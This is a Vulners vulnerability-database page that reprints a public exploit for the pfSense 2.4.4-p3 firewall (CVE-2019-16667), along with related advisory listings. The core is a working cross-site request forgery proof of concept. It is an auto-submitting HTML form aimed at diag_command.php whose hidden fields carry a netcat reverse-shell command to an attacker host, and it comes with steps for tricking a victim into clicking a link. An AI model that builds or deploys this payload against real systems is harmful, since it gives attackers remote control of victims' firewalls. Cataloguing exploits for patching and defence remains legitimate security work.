Vulners
Lucene search
pfSense 2.4.4-p3 Cross Site Request Forgery
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | pfSense 2.4.4-p3 - Cross-Site Request Forgery Vulnerability | 27 Jul 202000:00 | – | zdt |
 | pfSense Cross-Site Request Forgery Vulnerability (CNVD-2019-43356) | 27 Sep 201900:00 | – | cnvd |
 | CVE-2019-16667 | 26 Sep 201918:38 | – | cve |
 | CVE-2019-16667 | 26 Sep 201918:38 | – | cvelist |
 | pfSense 2.4.4-p3 - Cross-Site Request Forgery | 26 Jul 202000:00 | – | exploitdb |
 | CVE-2019-16667 | 26 Sep 201919:15 | – | nvd |
 | Cross site request forgery (csrf) | 26 Sep 201919:15 | – | prion |
 | CVE-2019-16667 | 7 Jan 202609:30 | – | redhatcve |
`# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
# Date: 2019-09-27
# Exploit Author: ghost_fh
# Vendor Homepage: https://www.pfsense.org/
# Software Link: https://www.pfsense.org/download/index.html?section=downloads
# Version: Till 2.4.4-p3
# Tested on: freebsd
# CVE : CVE-2019-16667
# Vulnerability Description :- The pfsense firewall is vulnerable to RCE
# chained with CSRF as it uses `csrf magic` library since it allows to tamper
# the CSRF token values submitted when processing the form requests. Due to
# this flaw, an attacker can exploit this vulnerability by crafting new page
# that contains attacker's controlled input such as a "reverse shell" (eg:
# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port
# >/tmp/f`token value) in the form and entice the victims to click
# on the crafted link via social engineering methods. Once the victim clicks
# on the link (try again button in this case), the attacker can take the
# lateral control of the victim's machine and malicious actions can be
# performed on the victim's behalf.
<!DOCTYPE html>
<html>
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
<form id="myForm" action="https://pfsense_ip/diag_command.php" method="POST">
<input type=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc attacker_ip attacker_port >/tmp/f">
<input type=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc attacker_ip attacker_port >/tmp/f">
<input type=hidden name="dlPath" value="">
<input type=hidden name="txtPHPCommand" value="">
<input type="hidden" name="submit" value="EXEC">
</form>
</body>
</html>
# Create a malicious page containing the above values and once user clicks on malicious link,
# he will be redirected to https://pfsense_ip/diag_command.php page.
# Victim will be greeted with the "Try again" button.
# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jul 2020 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.56098